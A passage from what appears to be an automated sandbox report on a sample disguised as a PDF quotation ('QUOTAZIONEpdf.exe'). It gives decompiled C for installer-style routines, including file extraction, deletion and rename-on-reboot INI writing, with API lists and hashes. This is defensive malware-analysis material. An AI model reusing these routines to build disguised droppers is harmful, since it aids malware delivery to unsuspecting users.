						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}


















                0x00403f8f
                0x004040b5
                0x00404111
                0x00404115
                0x004041ec
                0x004041ee
                0x004041ee
                0x004041f4
                0x004041f4
                0x004041f7
                0x00000000
                0x004041fe
                0x00404123
                0x00404125
                0x0040412f
                0x0040413a
                0x0040413d
                0x00404140
                0x0040414b
                0x0040414e
                0x00404155
                0x00404163
                0x0040417b
                0x00404183
                0x0040418e
                0x0040419e
                0x004041a0
                0x004041a0
                0x00404155
                0x004041aa
                0x00000000
                0x004041b5
                0x004041b9
                0x004041ca
                0x004041ca
                0x004041d0
                0x004041de
                0x004041de
                0x00000000
                0x004041e2
                0x004041aa
                0x004040c0
                0x00000000
                0x004040d4
                0x004040d4
                0x004040da
                0x004040da
                0x004040e0
                0x00000000
                0x00000000
                0x00404105
                0x00404107
                0x0040410c
                0x00000000
                0x0040410c
                0x004040c0
                0x00403f95
                0x00403f98
                0x00403f9d
                0x00403fae
                0x00403fae
                0x00403fb5
                0x00403fb8
                0x00403fba
                0x00403fbf
                0x00403fc8
                0x00403fce
                0x00403fda
                0x00403fdd
                0x00403fe6
                0x00403feb
                0x00403fee
                0x00403ff3
                0x0040400a
                0x00404011
                0x00404024
                0x00404027
                0x0040403c
                0x00404043
                0x00404048
                0x0040404d
                0x0040404d
                0x0040405c
                0x0040406b
                0x0040406d
                0x00404083
                0x00404092
                0x00404094
                0x00000000

                APIs
                • CheckDlgButton.USER32 ref: 0040400A
                • GetDlgItem.USER32 ref: 0040401E
                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                • GetSysColor.USER32(?), ref: 0040404D
                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                • lstrlenA.KERNEL32(?), ref: 00404075
                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                • GetDlgItem.USER32 ref: 004040F5
                • SendMessageA.USER32(00000000), ref: 004040F8
                • GetDlgItem.USER32 ref: 00404123
                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                • LoadCursorA.USER32 ref: 00404172
                • SetCursor.USER32(00000000), ref: 0040417B
                • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                • LoadCursorA.USER32 ref: 0040419B
                • SetCursor.USER32(00000000), ref: 0040419E
                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: @.B$N$open
                • API String ID: 3615053054-3815657624
                • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F
                • API String ID: 941294808-1304234792
                • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                0x004057d9
                0x004057e0
                0x004057e4
                0x004057ed
                0x004057f1
                0x00405930
                0x00405930
                0x00000000
                0x00405930
                0x004057f1
                0x004057fd
                0x00405813
                0x0040583b
                0x00405846
                0x0040584a
                0x0040586a
                0x00405871
                0x0040587b
                0x00405888
                0x0040588d
                0x00405892
                0x00405896
                0x00000000
                0x00000000
                0x004058a5
                0x004058a7
                0x004058b4
                0x004058b8
                0x00405929
                0x0040592a
                0x00000000
                0x004058d4
                0x004058e1
                0x00405946
                0x0040594d
                0x004058f4
                0x004058f4
                0x004058f6
                0x004058ff
                0x0040590a
                0x0040591c
                0x00405923
                0x00000000
                0x00405923
                0x0040594f
                0x00405950
                0x00405955
                0x00405957
                0x00405964
                0x00405964
                0x00405968
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405959
                0x00405959
                0x0040595c
                0x0040595f
                0x00405960
                0x00000000
                0x00405959
                0x004058ec
                0x004058f1
                0x00000000
                0x004058f1
                0x004058b8
                0x00405815
                0x00405820
                0x00405829
                0x0040582d
                0x00000000
                0x00000000
                0x0040582d
                0x0040593a

                APIs
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                • GetShortPathNameA.KERNEL32 ref: 00405829
                • GetShortPathNameA.KERNEL32 ref: 00405846
                • wsprintfA.USER32 ref: 00405864
                • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                • GlobalFree.KERNEL32 ref: 00405923
                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                  • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                  • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$(&B$[Rename]
                • API String ID: 3772915668-1834469719
                • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x00405ce5
                0x00405ced
                0x00405d01
                0x00405d01
                0x00405d07
                0x00405d14
                0x00405d14
                0x00405d15
                0x00405d17
                0x00405d1b
                0x00405d1d
                0x00405d26
                0x00405d28
                0x00405d42
                0x00405d4a
                0x00405d4a
                0x00405d4f
                0x00405d51
                0x00405d53
                0x00405d57
                0x00405d58
                0x00405d5b
                0x00405d63
                0x00405d65
                0x00405d69
                0x00000000
                0x00000000
                0x00405d6f
                0x00405d74
                0x00000000
                0x00000000
                0x00000000
                0x00405d74
                0x00405d79

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-2918476198
                • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                0x00403eb0
                0x00403f44
                0x00000000
                0x00403f44
                0x00403ec1
                0x00403ec5
                0x00000000
                0x00000000
                0x00403ecb
                0x00403ed4
                0x00403ed7
                0x00403ed7
                0x00403edd
                0x00403ee3
                0x00403ee3
                0x00403eef
                0x00403ef5
                0x00403efc
                0x00403eff
                0x00403f02
                0x00403f04
                0x00403f04
                0x00403f0c
                0x00403f12
                0x00403f12
                0x00403f1c
                0x00403f21
                0x00403f24
                0x00403f29
                0x00403f2c
                0x00403f2c
                0x00403f3c
                0x00403f3c
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                0x0040266e
                0x00402670
                0x0040267c
                0x0040267f
                0x00402689
                0x0040268d
                0x0040268d
                0x00402693
                0x004026a0
                0x004026a8
                0x004026ab
                0x004026b1
                0x004026bf
                0x004026c4
                0x004026c8
                0x004026cb
                0x004026d4
                0x004026e0
                0x004026e4
                0x004026e7
                0x004026f1
                0x00402710
                0x004026f8
                0x004026fd
                0x00402705
                0x00402708
                0x0040270d
                0x0040270d
                0x00402717
                0x00402717
                0x00402729
                0x00402730
                0x00402742
                0x00402742
                0x00402748
                0x00402748
                0x00402753
                0x00402754
                0x00402758
                0x0040275c
                0x00402762
                0x00402762
                0x00402769
                0x00402156
                0x00402880
                0x0040288c

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                • GlobalFree.KERNEL32 ref: 00402717
                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                • GlobalFree.KERNEL32 ref: 00402730
                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                • String ID:
                • API String ID: 3294113728-0
                • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
